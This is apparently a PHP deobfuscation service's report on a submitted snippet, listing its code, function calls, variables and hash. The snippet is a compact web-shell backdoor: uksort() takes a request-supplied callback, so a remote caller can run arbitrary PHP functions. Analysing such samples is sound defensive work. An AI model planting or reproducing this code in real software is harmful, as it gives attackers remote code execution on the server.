Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; $arr = array('test' => 1, $_REQUEST['pass'] => 2); uksort($a..

Decoded Output download

<?php 
$e = $_REQUEST['e']; 
$arr = array('test' => 1, $_REQUEST['pass'] => 2); 
uksort($arr, $e); 
?>

Did this file decode correctly?

Original Code

<?php
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
?>

Function Calls

uksort 1

Variables

$e None
$arr [{'key': 'test', 'value': 1}, {'key': 1, 'value': 2}]

Stats

MD5 f0284e5aac05bdd70be88d809b0c6c6b
Eval Count 0
Decode Time 89 ms